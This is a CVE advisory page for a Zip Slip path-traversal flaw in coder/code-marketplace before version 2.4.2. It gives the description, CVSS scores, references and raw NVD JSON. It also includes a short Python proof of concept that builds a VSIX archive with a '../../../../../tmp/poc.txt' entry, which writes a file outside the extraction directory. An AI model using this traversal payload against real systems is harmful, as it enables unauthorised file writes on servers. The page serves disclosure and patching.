CVE-2026-35454

Description

The Code Extension Marketplace is an open-source alternative to the VS Code Marketplace. Prior to 2.4.2, Zip Slip vulnerability in coder/code-marketplace allowed a malicious VSIX file to write arbitrary files outside the extension directory. ExtractZip passed raw zip entry names to a callback that wrote files via filepath.Join with no boundary check; filepath.Join resolved .. components but did not prevent the result from escaping the base path. This vulnerability is fixed in 2.4.2.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:coder:code-marketplace:*:*:*:*:*:*:*:* - VULNERABLE

coder/code-marketplace < 2.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os

def create_malicious_vsix(output_filename):
    """
    Creates a malicious VSIX file demonstrating the Zip Slip vulnerability.
    The file contains an entry with path traversal sequences ('../').
    """
    with zipfile.ZipFile(output_filename, 'w') as zf:
        # Construct a path that escapes the extraction directory
        malicious_path = "../../../../../tmp/poc.txt"
        
        # Write arbitrary content to the malicious path
        zf.writestr(malicious_path, b"This file was written via Zip Slip vulnerability.")
        
    print(f"[+] Malicious VSIX file created: {output_filename}")
    print(f"[+] Payload path: {malicious_path}")

if __name__ == "__main__":
    create_malicious_vsix("exploit.vsix")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35454
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35454
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35454/
[4] VulDB https://vuldb.com/cve/CVE-2026-35454
[5] https://github.com/coder/code-marketplace/releases/tag/v2.4.2
[6] https://github.com/coder/code-marketplace/security/advisories/GHSA-8x9r-hvwg-c55h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35454", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:23.760", "lastModified": "2026-04-28T17:01:42.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Code Extension Marketplace is an open-source alternative to the VS Code Marketplace. Prior to 2.4.2, Zip Slip vulnerability in coder/code-marketplace allowed a malicious VSIX file to write arbitrary files outside the extension directory. ExtractZip passed raw zip entry names to a callback that wrote files via filepath.Join with no boundary check; filepath.Join resolved .. components but did not prevent the result from escaping the base path. This vulnerability is fixed in 2.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coder:code-marketplace:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.4.1", "matchCriteriaId": "D11F6EF2-16FD-4E7B-9728-50C32FB68099"}]}]}], "references": [{"url": "https://github.com/coder/code-marketplace/releases/tag/v2.4.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/coder/code-marketplace/security/advisories/GHSA-8x9r-hvwg-c55h", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}